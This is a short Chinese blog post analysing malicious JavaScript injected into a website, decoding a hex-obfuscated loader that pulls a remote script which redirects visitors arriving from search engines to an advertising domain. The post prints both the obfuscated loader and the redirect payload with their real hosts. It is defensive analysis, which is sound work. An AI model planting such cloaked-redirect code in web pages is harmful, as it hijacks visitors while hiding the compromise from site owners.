直接替换最外层的eval为console.log,然后得到
window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”]( \x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x73\x73\x64\x6c\x63\x2e\x63\x6f\x6d\x2f\x6e\x62\x2e\x6a\x73\x22\x3e \x2f\x73\x63\x72\x69\x70\x74\x3e);
然后发现是编码后的文字,于是直接两侧套个“,得到
window[“document”][“write”](<script type=”text/javascript” src=”https://www.gssdlc.com/nb.js”></script>);
于是结果就是加载一个js文件,直接下载这个js文件,得到
document.writeln(“<script LANGUAGE=\”Javascript\”>”);
document.writeln(“var s=document.referrer”);
document.writeln(“if(s.indexOf(\”baidu\”)>0 || s.indexOf(\”sogou\”)>0 || s.indexOf(\”soso\”)>0 ||s.indexOf(\”sm\”)>0 ||s.indexOf(\”uc\”)>0 ||s.indexOf(\”bing\”)>0 ||s.indexOf(\”yahoo\”)>0 ||s.indexOf(\”so\”)>0 )”);
document.writeln(“location.href=\”https://www.444332.vip/?channel=P00142\”;”);
document.writeln(“</script>”);
没有啥可看的,基本就是判断是不是从国内主流搜索引擎来的,搜索引擎来的就跳转,不是搜索引擎来的就不跳转。。。。。所以你自己访问的时候可能不会看到广告页面,而新用户访问的时候则会看到广告页面(
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END